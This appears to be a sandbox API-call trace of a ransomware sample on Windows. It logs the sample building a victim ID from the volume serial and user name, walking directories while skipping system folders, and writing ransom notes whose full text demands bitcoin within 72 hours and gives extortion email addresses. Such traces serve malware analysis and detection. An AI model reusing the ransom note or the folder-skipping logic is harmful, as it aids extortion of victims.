	[0176.148] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.149] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.149] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0176.150] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.156] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0176.157] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.157] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.157] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0176.157] CloseHandle (hObject=0x384) returned 1
	[0176.158] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8284ec68, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0176.158] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\*.*") returned 39
	[0176.158] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.158] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\*.*", cchLength=0x27 | out: lpsz="c:\\users\\all users\\microsoft\\search\\*.*") returned 0x27
	[0176.158] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.159] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="windows") returned 0x0
	[0176.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.159] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="boot") returned 0x0
	[0176.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.159] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="system volume information") returned 0x0
	[0176.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.160] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.160] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="temp") returned 0x0
	[0176.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.160] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="program files") returned 0x0
	[0176.160] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.161] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.161] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="appdata") returned 0x0
	[0176.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.161] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="application data") returned 0x0
	[0176.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.161] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="winnt") returned 0x0
	[0176.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.162] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="tmp") returned 0x0
	[0176.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.162] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="cache") returned 0x0
	[0176.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.162] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.162] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="webcache") returned 0x0
	[0176.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="inetcache") returned 0x0
	[0176.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="nvidia") returned 0x0
	[0176.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="packages") returned 0x0
	[0176.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="cookies") returned 0x0
	[0176.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.164] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\*.*", lpSrch="programdata") returned 0x0
	[0176.164] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.164] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.164] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8284ec68, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.164] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.164] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1
	[0176.164] lstrcmpW (lpString1="Data", lpString2="..") returned 1
	[0176.164] lstrcmpW (lpString1="Data", lpString2=".") returned 1
	[0176.165] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search") returned="C:\\Users\\All Users\\Microsoft\\Search"
	[0176.165] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\"
	[0176.165] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\", lpString2="Data" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data"
	[0176.165] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data"
	[0176.165] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\"
	[0176.165] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\"
	[0176.165] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*"
	[0176.165] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0176.166] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned 44
	[0176.166] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.166] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\*.*") returned 0x2c
	[0176.166] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.173] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="windows") returned 0x0
	[0176.173] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.173] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="boot") returned 0x0
	[0176.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="system volume information") returned 0x0
	[0176.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="temp") returned 0x0
	[0176.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="program files") returned 0x0
	[0176.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="appdata") returned 0x0
	[0176.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="application data") returned 0x0
	[0176.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="winnt") returned 0x0
	[0176.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="tmp") returned 0x0
	[0176.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="cache") returned 0x0
	[0176.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="webcache") returned 0x0
	[0176.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="inetcache") returned 0x0
	[0176.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="nvidia") returned 0x0
	[0176.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="packages") returned 0x0
	[0176.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="cookies") returned 0x0
	[0176.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="programdata") returned 0x0
	[0176.178] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.178] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1
	[0176.178] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3847afbf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1
	[0176.178] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3847afbf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0
	[0176.178] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0176.179] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0176.179] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data"
	[0176.179] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*"
	[0176.179] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.180] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.180] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HELP_DECRYPT_YOUR_FILES.TXT") returned 68
	[0176.180] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.181] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.181] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0176.189] CloseHandle (hObject=0x388) returned 1
	[0176.190] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.191] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0176.192] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.192] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.192] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0176.193] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.193] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0176.193] CloseHandle (hObject=0x388) returned 1
	[0176.193] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.193] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.194] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.194] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HELP_DECRYPT_YOUR_FILES.HTML") returned 69
	[0176.194] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.199] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.200] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0176.202] CloseHandle (hObject=0x388) returned 1
	[0176.203] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.203] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.204] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0176.205] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.205] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.205] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0176.205] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.205] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0176.206] CloseHandle (hObject=0x388) returned 1
	[0176.206] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x828e7429, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0176.206] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned 44
	[0176.206] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.206] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft\\search\\data\\*.*") returned 0x2c
	[0176.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\search\\data\\*.*", lpSrch="windows") returned 0x0
	[0176.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
